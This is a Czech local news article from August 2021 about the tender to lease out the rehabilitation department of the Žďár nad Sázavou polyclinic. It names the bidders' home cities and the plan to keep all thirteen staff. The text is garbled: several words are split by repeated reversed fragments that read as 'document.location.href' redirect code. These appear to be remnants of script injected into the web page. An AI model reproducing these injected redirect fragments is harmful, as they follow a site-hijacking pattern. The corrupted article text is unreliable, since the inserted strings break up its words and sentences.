Rainbow page separator

O pacht rehabilitace v poliklinice mají zájem tři subjekty

Neděle, 8. srpna 2021

Poliklinika Žďár nad Sázavou

Žďár nad Sázavou / Druhé kolo výběrového řízení na pacht rehabilitace ve žďárské poliklinice se uskuteční 18. srpna. Vzejít by z něj měl nový provozovatel rehabilitačního provozu. Z prvního kola vyprofilovali tři vážní zájemci, kteří navrhli svoje podmínky a plány – jeden z Brna, druhý z Pardubic a třetí ze Žďáru nad Sázavou. V druhém kole výběrová komise doporučí vítěze, nicméně konečné rozhodnutí o dodavateli služeb, jenž nabízí nejlepší podmínky pachtu, bude na žďárských radních. Nový provozovatel má rehabilitaci převzít od začátku příštího roku, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to současně se všemi třinácti stávajícími zaměstnanci.
Poliklinika coby příspěvková organizace města a současný provozovatel rehabilitace v poliklinice má zájem, aby oddělení provozoval tým profesionálů, kteří klientům poskytnou služby na nejvyšší úrovni a zajistí jejich spokojenost. Rehabilitace se zabývá ambulantní fyzioterapií ve smyslu léčby akutních i chronických potíží pohybového aparátu, poúrazových a pooperačních stavů, ale i prevence zmíněných obtíží. Služby spočívají v terapiích pomocí cvičení, elektroléčby, vodoléčby a dalších procedur. Využívají je jak klienti zdravotních pojišťoven, tak samoplátci.
Jedná se v pořadí o druhý pacht v poliklinice – už dříve byla propach[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tována labora[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toř klinické biochemie a hema[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tologie, která má nového provozovatele od le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošního ledna.